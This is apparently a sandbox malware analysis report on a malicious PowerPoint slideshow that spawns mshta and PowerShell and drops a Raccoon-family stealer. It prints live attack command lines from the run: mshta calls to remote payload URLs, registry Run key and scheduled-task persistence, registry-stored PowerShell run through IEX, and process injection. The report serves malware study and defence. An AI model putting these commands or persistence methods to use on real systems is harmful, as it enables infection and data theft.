Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
19-04-2021 12:22
Static task
static1
Behavioral task
behavioral1
Sample
a621e8ce92943201dce4f5965fa4199b.pps
Resource
win7v20210410
Behavioral task
behavioral2
Sample
a621e8ce92943201dce4f5965fa4199b.pps
Resource
win10v20210410
General
-
Target
a621e8ce92943201dce4f5965fa4199b.pps
-
Size
62KB
-
MD5
a621e8ce92943201dce4f5965fa4199b
-
SHA1
d0c4e4d68327803cce5a31bf1b375faee2a3ebb9
-
SHA256
4091dc5f238a7795b1ade8879c2bc7c9ac85ab1f107c2d1c3ac16a8da871ff7d
-
SHA512
c7a4c42904a5aed4f8a381e3c92f20c9e8c164519b0e194ae4fea49c1de097818540f437ca15e6e875eab6ea93be9eebf9a92895abc8710c96bfb1be972e9107
Malware Config
Extracted
https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx
Extracted
raccoon
e4dbb69554a4dcf2a21c14794d523a7e729dc429
-
url4cnc
https://telete.in/telehabarik
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2348 2116 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 3516 powershell.exe -
Blocklisted process makes network request 12 IoCs
Processes:
mshta.exepowershell.exeflow pid process 17 2348 mshta.exe 19 2348 mshta.exe 21 2348 mshta.exe 23 2348 mshta.exe 25 2348 mshta.exe 33 2348 mshta.exe 34 2348 mshta.exe 36 2348 mshta.exe 38 2348 mshta.exe 39 2348 mshta.exe 45 2380 powershell.exe 47 2380 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
aspnet_compiler.exepid process 4300 aspnet_compiler.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%1230948@newblogset144.blogspot.com/p/42.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%1230948@firstblognew123.blogspot.com/p/42.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%1230948@papagunnakjdnmwdnwmndwm.blogspot.com/p/42.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2380 set thread context of 4300 2380 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3848 2348 WerFault.exe mshta.exe 4432 4300 WerFault.exe aspnet_compiler.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 432 taskkill.exe 2636 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2116 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 45 IoCs
Processes:
powershell.exeWerFault.exeWerFault.exepid process 2380 powershell.exe 2380 powershell.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 3848 WerFault.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exetaskkill.exetaskkill.exeWerFault.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 2636 taskkill.exe Token: SeDebugPrivilege 3848 WerFault.exe Token: SeIncreaseQuotaPrivilege 2380 powershell.exe Token: SeSecurityPrivilege 2380 powershell.exe Token: SeTakeOwnershipPrivilege 2380 powershell.exe Token: SeLoadDriverPrivilege 2380 powershell.exe Token: SeSystemProfilePrivilege 2380 powershell.exe Token: SeSystemtimePrivilege 2380 powershell.exe Token: SeProfSingleProcessPrivilege 2380 powershell.exe Token: SeIncBasePriorityPrivilege 2380 powershell.exe Token: SeCreatePagefilePrivilege 2380 powershell.exe Token: SeBackupPrivilege 2380 powershell.exe Token: SeRestorePrivilege 2380 powershell.exe Token: SeShutdownPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeSystemEnvironmentPrivilege 2380 powershell.exe Token: SeRemoteShutdownPrivilege 2380 powershell.exe Token: SeUndockPrivilege 2380 powershell.exe Token: SeManageVolumePrivilege 2380 powershell.exe Token: 33 2380 powershell.exe Token: 34 2380 powershell.exe Token: 35 2380 powershell.exe Token: 36 2380 powershell.exe Token: SeIncreaseQuotaPrivilege 2380 powershell.exe Token: SeSecurityPrivilege 2380 powershell.exe Token: SeTakeOwnershipPrivilege 2380 powershell.exe Token: SeLoadDriverPrivilege 2380 powershell.exe Token: SeSystemProfilePrivilege 2380 powershell.exe Token: SeSystemtimePrivilege 2380 powershell.exe Token: SeProfSingleProcessPrivilege 2380 powershell.exe Token: SeIncBasePriorityPrivilege 2380 powershell.exe Token: SeCreatePagefilePrivilege 2380 powershell.exe Token: SeBackupPrivilege 2380 powershell.exe Token: SeRestorePrivilege 2380 powershell.exe Token: SeShutdownPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeSystemEnvironmentPrivilege 2380 powershell.exe Token: SeRemoteShutdownPrivilege 2380 powershell.exe Token: SeUndockPrivilege 2380 powershell.exe Token: SeManageVolumePrivilege 2380 powershell.exe Token: 33 2380 powershell.exe Token: 34 2380 powershell.exe Token: 35 2380 powershell.exe Token: 36 2380 powershell.exe Token: SeRestorePrivilege 4432 WerFault.exe Token: SeBackupPrivilege 4432 WerFault.exe Token: SeDebugPrivilege 4432 WerFault.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
POWERPNT.EXEpid process 2116 POWERPNT.EXE 2116 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exedescription pid process target process PID 2116 wrote to memory of 2348 2116 POWERPNT.EXE mshta.exe PID 2116 wrote to memory of 2348 2116 POWERPNT.EXE mshta.exe PID 2348 wrote to memory of 3292 2348 mshta.exe schtasks.exe PID 2348 wrote to memory of 3292 2348 mshta.exe schtasks.exe PID 2348 wrote to memory of 432 2348 mshta.exe taskkill.exe PID 2348 wrote to memory of 432 2348 mshta.exe taskkill.exe PID 2348 wrote to memory of 2636 2348 mshta.exe taskkill.exe PID 2348 wrote to memory of 2636 2348 mshta.exe taskkill.exe PID 2380 wrote to memory of 4252 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4252 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4252 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4260 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4260 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4260 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4268 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4268 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4268 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4276 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4276 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4276 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4284 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4284 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4284 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4292 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4292 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4292 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 4300 2380 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a621e8ce92943201dce4f5965fa4199b.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exe"mshta""https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@getyournewblog.blogspot.com/p/42.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2348 -s 24643⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 15443⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/432-182-0x0000000000000000-mapping.dmp
-
memory/2116-114-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-115-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-116-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-117-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-119-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-118-0x00007FF85AE50000-0x00007FF85CA2D000-memory.dmpFilesize
27.9MB
-
memory/2116-122-0x00000164968A0000-0x000001649798E000-memory.dmpFilesize
16.9MB
-
memory/2116-123-0x00007FF851AB0000-0x00007FF8539A5000-memory.dmpFilesize
31.0MB
-
memory/2116-179-0x00000164A4C50000-0x00000164A4C54000-memory.dmpFilesize
16KB
-
memory/2348-180-0x0000000000000000-mapping.dmp
-
memory/2380-186-0x0000022062BB6000-0x0000022062BB8000-memory.dmpFilesize
8KB
-
memory/2380-184-0x0000022062BB0000-0x0000022062BB2000-memory.dmpFilesize
8KB
-
memory/2380-185-0x0000022062BB3000-0x0000022062BB5000-memory.dmpFilesize
8KB
-
memory/2380-187-0x0000022062BB8000-0x0000022062BB9000-memory.dmpFilesize
4KB
-
memory/2636-183-0x0000000000000000-mapping.dmp
-
memory/3292-181-0x0000000000000000-mapping.dmp
-
memory/4300-188-0x000000000043DC5B-mapping.dmp
-
memory/4300-189-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB